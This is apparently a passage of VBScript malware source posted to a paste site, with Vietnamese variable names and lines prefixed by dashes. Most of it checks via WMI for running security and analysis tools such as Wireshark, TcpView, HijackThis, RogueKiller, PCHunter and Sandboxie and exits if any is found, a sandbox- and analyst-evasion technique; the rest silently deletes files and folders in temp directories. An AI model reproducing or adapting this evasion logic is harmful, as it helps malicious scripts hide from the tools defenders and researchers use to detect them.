- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'fakenet.exe'")
- set TTR_SAU = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'fab.exe'")
- set TTR_BAY = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'cports.exe'")
- set TTR_TAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'smsniff.exe'")
- set TTR_CHIN_1 = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'pchunter32.exe'")
- set TTR_CHIN_2 = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'pchunter64.exe'")
- set TTR_MUOI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'roguekiller.exe'")
- set TTR_MUOI_MOT = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'spybhoremover.exe'")
- set TTR_MUOI_HAI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'defenderdaemon.exe'")
- set TTR_MUOI_BA = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'HijackThis.exe'")
- set TTR_MUOI_BON = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Wireshark.exe'")
- set TTR_MUOI_LAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Vbs Lookup.exe'")
- set TTR_MUOI_SAU = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Vbs Killer.exe'")
- set TTR_MUOI_BAY = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Vbs Deleter.exe'")
- set TTR_MUOI_TAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'sandboxierpcss.exe'")
- set TTR_MUOI_CHIN = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'netagent.exe'")
- set TTR_HAI_MUOI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'tiger-Firewall.exe'")
- set TTR_HAI_MUOI_MOT = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'TcpView.exe'")
- set TTR_HAI_MUOI_HAI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'ProcessLasso.exe'")
- set TTR_HAI_MUOI_BA = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Active Ports.exe'")
- set TTR_HAI_MUOI_BON = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'SystemExplorer.exe'")
- if TTR_MOT.Count = 1 or TTR_HAI.Count = 1 or TTR_BA.Count = 1 or TTR_BON.Count = 1 or TTR_NAM.Count = 1 or TTR_SAU.Count = 1 or TTR_BAY.Count = 1 or TTR_TAM.Count = 1 then
- wscript.quit
- end if
- if TTR_CHIN_1.Count = 1 or TTR_CHIN_2.Count = 1 or TTR_MUOI.Count = 1 or TTR_MUOI_MOT.Count = 1 or TTR_MUOI_HAI.Count = 1 or TTR_MUOI_BA.Count = 1 or TTR_MUOI_BON.Count = 1 then
- wscript.quit
- end if
- if TTR_MUOI_LAM.Count = 1 or TTR_MUOI_SAU.Count = 1 or TTR_MUOI_BAY.Count = 1 or TTR_MUOI_TAM.Count = 1 or TTR_MUOI_CHIN.Count = 1 or TTR_HAI_MUOI.Count = 1 or TTR_HAI_MUOI_MOT.Count = 1 or TTR_HAI_MUOI_HAI.Count = 1 or TTR_HAI_MUOI_BA.Count = 1 or TTR_HAI_MUOI_BON.Count = 1 then
- wscript.quit
- end if
- end sub
- sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
- On Error Resume Next
- dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
- dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
- dim OBJ_CAC_FILE_TEMP
- dim i
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
- For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
- If OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_FILE_TEMP.delete(True) End If
- Next
- For i = 0 To 10
- For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
- If OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_DIR_TEMP.Delete(True) End If
- Next
- Next
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
- set OBJ_CAC_DIR_TEMP = Nothing
- set OBJ_CAC_FILE_TEMP = Nothing
- end sub
- sub XOA_TEMP_SUB_LUC_GO(STR_DUONG_DAN_TEMP_IN_SUB)
- On Error Resume Next
- dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
- dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
- dim OBJ_CAC_FILE_TEMP
- dim i
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB)
- For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
- OBJ_CAC_FILE_TEMP.delete(True)
- Next
- For i = 0 To 10
- For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
- OBJ_CAC_DIR_TEMP.Delete(True)
- Next
- Next
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
- set OBJ_CAC_DIR_TEMP = Nothing
- set OBJ_CAC_FILE_TEMP = Nothing
- end sub"
Add Comment
Please, Sign In to add comment